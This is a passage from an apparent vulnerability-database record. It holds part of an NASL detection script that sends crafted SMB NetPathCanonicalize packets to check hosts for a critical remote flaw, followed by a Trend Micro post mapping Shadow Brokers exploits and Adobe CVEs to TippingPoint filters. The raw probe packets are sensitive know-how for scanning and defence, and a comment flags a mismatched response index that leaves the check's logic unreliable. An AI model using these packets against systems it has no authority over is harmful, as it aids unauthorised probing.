dcerpc_bind_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## Read AndX Request, FID: 0x4000\nread_andx_req = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x80, 0x01, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x04, 0x00, 0x04, 0xff, 0xff, 0xff, 0xff, 0x00,\n 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:read_andx_req );\nread_andx_resp = smb_recv( socket:soc );\nif( ! read_andx_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## Packet type: 12 (Bind_ack) @ offset 66 - 1 byte\n## Auth Length: 00 @ Offset 74 - 2 bytes\n## Call ID : 00 @ Offset 76 - 4 bytes\n\nif( strlen( read_andx_resp ) > 79 &&\n ! 
( ord( read_andx_resp[66] ) == 12 && ord( read_andx_resp[74] ) == 00 &&\n ord( read_andx_resp[75] ) == 00 && ord( read_andx_resp[76] ) == 00 &&\n ord( read_andx_resp[77] ) == 00 && ord( read_andx_resp[78] ) == 00 &&\n ord( read_andx_resp[79] ) == 00 ) ) {\n close( soc );\n exit( 0 );\n}\n\n## NetPathCanonicalize request\nnetpath_can_req = raw_string(0x00, 0x00, 0x00, 0xb8, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0xc0, 0x01, 0x10, 0x00, 0x00, 0x64,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x54, 0x00, 0x64, 0x00, 0x54, 0x00, 0x02,\n 0x00, 0x26, 0x00, 0x00, 0x40, 0x75, 0x00, 0x00,\n 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,\n 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n 0x64, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x4c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x6d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,\n 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x07, 0x00, 0x00, 0x00, 0x4f, 0x00, 0x70, 0x00,\n 0x65, 0x00, 0x6e, 0x00, 0x56, 0x41, 0x53, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:netpath_can_req );\nnetpath_can_resp = smb_recv( socket:soc );\nif( ! 
netpath_can_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SRVSVC NetPathCanonicalize request\nnetpath_req = raw_string(0x00, 0x00, 0x00, 0xac, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x00, 0x02, 0x10, 0x00, 0x00, 0x58,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x54, 0x00, 0x58, 0x00, 0x54, 0x00, 0x02,\n 0x00, 0x26, 0x00, 0x00, 0x40, 0x69, 0x00, 0x00,\n 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,\n 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n 0x58, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x6d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:netpath_req );\nnetpath_resp = smb_recv( socket:soc );\nif( ! netpath_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Disconnect Request\nsmb_tree_dis_req = raw_string(0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,\n 0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x40, 0x02, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_tree_dis_req );\nsmb_tree_dis_resp = smb_recv( socket:soc );\nif( ! 
smb_tree_dis_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Logoff AndX Request\nsmb_logoff_req = raw_string(0x00, 0x00, 0x00, 0x27, 0xff, 0x53, 0x4d, 0x42,\n 0x74, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x08, 0x80, 0x02, 0x02, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_logoff_req );\nsmb_logoff_resp = smb_recv( socket:soc );\nif( ! smb_logoff_resp ) {\n close( soc );\n exit( 0 );\n}\n\nclose( soc );\n\n## After applying the patch these fields will be filled with '00'\n## NOTE(review): the last comparison reads netpath_can_resp[98] while the strlen() guard and the\n## other six comparisons read netpath_resp -- confirm which response is intended, and make sure the\n## length guard covers the response whose index 98 is actually dereferenced.\nif( strlen( netpath_resp ) > 98 &&\n ord( netpath_resp[88] ) == 79 && ord( netpath_resp[90] ) == 112 &&\n ord( netpath_resp[92] ) == 101 && ord( netpath_resp[94] ) == 110 &&\n ord( netpath_resp[96] ) == 86 && ord( netpath_resp[97] ) == 65 &&\n ord( netpath_can_resp[98] ) == 83 ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-05-01T13:42:31", "bulletinFamily": "blog", "description": "\n\nI\u2019ve never been one to adopt the latest fashion trends, aside from what I wore growing up in the 1980s. I wore shoulder pads, blue eyeliner, designer jeans, and even parachute pants. While I continue to rock my 80s hair to this day, other trends I thought were long gone are making a comeback. (Shoulder pads \u2013 seriously?) History tends to repeat itself \u2013 what\u2019s old is new again \u2013 and it\u2019s no different in the security world.\n\n \n\nLast weekend, a group known as \u201cShadow Brokers\u201d released a large set of tools that can exploit flaws in several versions of Microsoft products and other platforms. A number of the exploits have CVEs that date as far back as 2001. In fact, one of the exploits named \u201cEwokFrenzy\u201d was discovered through our Zero Day Initiative over 10 years ago. 
Customers with TippingPoint solutions have had coverage for EwokFrenzy through Digital Vaccine\u00ae (DV) filter 4033 since **January 2006!**\n\nOur TippingPoint DVLabs team continues to review the contents associated with the Shadow Brokers disclosure to recommend coverage for TippingPoint solutions. The following table includes the DV filters that provide protection, including new filters released in an out-of-band release this week:\n\n** Exploit Name** | ** MS Bulletin** | ** CVE/ZDI** | ** Filters** | ** 0day?** | ** Status** \n---|---|---|---|---|--- \nDoublePulsar \n(Payload) | | | *27935 | N/A | Policy Filter \nEarlyShovel | | | *27938 | Unknown | Detects Exploit \nEasyBee** | | CVE-2007-1675 \nZDI-07-011 | | No | Investigating \nEasyPi | | | | Unknown | Investigating \nEbbisLand | | CVE-2001-0236 | 621, 622, 3512, 3791 | No | Investigating \nEchoWrecker | | CVE-2003-0201 | 1676 | No | Investigating \nEclipsedWing | MS08-067 | CVE-2008-4250 | 6515 | No | Detects Exploit \nEducatedScholar | MS09-050 | | 8465 | No | Detects Exploit \nELV | MS06-040 | CVE-2006-3439 | 9317 | No | Detects Exploit \nEmeraldThread | MS10-061 | | 10458, *27939 | No | Detects Exploit \nEmphasisMine | | | | Unknown | Investigating \nEnglishManDentist | | | | Unknown | Investigating \nErraticGopher | | | *27932 | Yes | Detects Exploit \nESKE | | CVE-2003-0352 | | No | Investigating \nEskimoRoll | MS14-068 | CVE-2014-6324 | *27940 | No | Exploit Unfilterable \nPolicy Filter \nEsteemAudit | | | *27933 | Yes | Detects Exploit \nEternalBlue | MS17-010 | | 27433, 27711, *27928 | No | Detects Exploit \nEternalChampion | MS17-010 | CVE-2017-0146 | 27433, 27711, *27929 | No | Detects Exploit \nEternalRomance | MS17-010 | | | No | Investigating \nEternalSynergy | MS17-010 | CVE-2017-0714 | *27937 | No | Detects Exploit \nEtre | | | | No | Investigating \nEVFR | | CVE-2003-0109 | 1612 | No | Detects Exploit \nEwokFrenzy | | CVE-2007-1675 \nZDI-07-011 | 4033 | No | Detects Exploit \nExplodingCan 
| | CVE-2017-7269 | 27643 | No | Detects Exploit \n* New DV filter \n**Identical to EwokFrenzy, but exploit untested against filter \n \n \n\n[Click here](<https://success.trendmicro.com/solution/1117192>) for more information on Trend Micro\u2019s response and recommendations for coverage across all Trend Micro products.\n\n**Adobe Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe Security Bulletins released on or before April 6, 2017.The following table maps Digital Vaccine filters to the Adobe updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s Adobe security updates from Dustin Childs\u2019 [April 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/4/11/the-april-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB17-10 | CVE-2017-3058 | 27698 | \nAPSB17-10 | CVE-2017-3059 | *27697 | \nAPSB17-10 | CVE-2017-3060 | 27832 | \nAPSB17-10 | CVE-2017-3061 | 27833 | \nAPSB17-10 | CVE-2017-3062 | *27533 | \nAPSB17-10 | CVE-2017-3063 | *27534 | \nAPSB17-10 | CVE-2017-3064 | 27836 | \nAPSB17-11 | CVE-2017-3013 | 27923, 27925 | \nAPSB17-11 | CVE-2017-3014 | 27824 | \nAPSB17-11 | CVE-2017-3017 | 27827 | \nAPSB17-11 | CVE-2017-3019 | *26521 | \nAPSB17-11 | CVE-2017-3020 | *26491 | \nAPSB17-11 | CVE-2017-3021 | *26510 | \nAPSB17-11 | CVE-2017-3022 | *26631 | \nAPSB17-11 | CVE-2017-3023 | *26535 | \nAPSB17-11 | CVE-2017-3024 | 27829 | \nAPSB17-11 | CVE-2017-3025 | 27851 | \nAPSB17-11 | CVE-2017-3026 | 27852 | \nAPSB17-11 | CVE-2017-3027 | 27909 | \nAPSB17-11 | CVE-2017-3028 | *27160 | \nAPSB17-11 | CVE-2017-3029 | *27159 | \nAPSB17-11 | CVE-2017-3030 | 27823 | \nAPSB17-11 | CVE-2017-3031 | *27241, *27260 | \nAPSB17-11 | CVE-2017-3032 | *27158 | \nAPSB17-11 | CVE-2017-3033 | *27261 | \nAPSB17-11 | 
CVE-2017-3034 | *27225 | \nAPSB17-11 | CVE-2017-3035 | *27236 | \nAPSB17-11 | CVE-2017-3036 | *27304 | \nAPSB17-11 | CVE-2017-3037 | 27849 | \nAPSB17-11 | CVE-2017-3038 | 27908 | \nAPSB17-11 | CVE-2017-3039 | 27905 | \nAPSB17-11 | CVE-2017-3041 | 27903 | \nAPSB17-11 | CVE-2017-3043 | N/A | Local Vulnerability \nAPSB17-11 | CVE-2017-3042 | *27554, *27556, *27557, *27811 | \nAPSB17-11 | CVE-2017-3044 | 27914 | \nAPSB17-11 | CVE-2017-3045 | 27915 | \nAPSB17-11 | CVE-2017-3046 | 27916 | \nAPSB17-11 | CVE-2017-3047 | 27919 | \nAPSB17-11 | CVE-2017-3048 | *27750 | \nAPSB17-11 | CVE-2017-3049 | 27922 | \nAPSB17-11 | CVE-2017-3050 | *27808 | \nAPSB17-11 | CVE-2017-3051 | *27749 | \nAPSB17-11 | CVE-2017-3052 | *27748 | \nAPSB17-11 | CVE-2017-3053 | *27704 | \nAPSB17-11 | CVE-2017-3054 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3055 | *27522 | \nAPSB17-11 | CVE-2017-3056 | *27520 | \nAPSB17-11 | CVE-2017-3057 | *27521 | \nAPSB17-11 | CVE-2017-3011 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3012 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3015 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3018 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3039 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3040 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3065 | N/A | Insufficient Information \n \n \n\n**Zero-Day Filters**\n\nThere are 13 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (10)_**\n\n| \n\n * 27812: ZDI-CAN-4572: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27820: ZDI-CAN-4571: Zero Day Initiative Vulnerability (Adobe Acrobat Reader DC)\n * 27821: ZDI-CAN-4570: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27822: ZDI-CAN-4569: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27832: HTTP: Adobe Flash length Memory Corruption Vulnerability (ZDI-17-247, ZDI-17-248)\n * 27914: HTTP: Adobe Acrobat Pro DC JPEG2000 Buffer Overflow Vulnerability (ZDI-17-267)\n * 27915: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-268)\n * 27916: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-270)\n * 27919: HTTP: Adobe Acrobat Pro DC Annotations Use-After-Free Vulnerability (ZDI-17-271)\n * 27922: HTTP: Adobe Acrobat Pro DC ImageConversion Buffer Overflow Vulnerability (ZDI-17-273)**_ _** \n---|--- \n| \n \n**_Cisco (1)_**\n\n| \n\n * 27807: ZDI-CAN-4635: Zero Day Initiative Vulnerability (Cisco License Manager Server) \n---|--- \n| \n \n**_MIcrosoft (1)_**\n\n| \n\n * 27810: ZDI-CAN-4573: Zero Day Initiative Vulnerability (Microsoft Internet Explorer)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 27804: ZDI-CAN-4638-4639: Zero Day Initiative Vulnerability (Trend Micro Control Manager)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-10-2017/>).", "modified": "2017-04-21T18:23:45", "published": "2017-04-21T18:23:45", "href": 
"http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-17-2017/", "id": "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of April 17, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}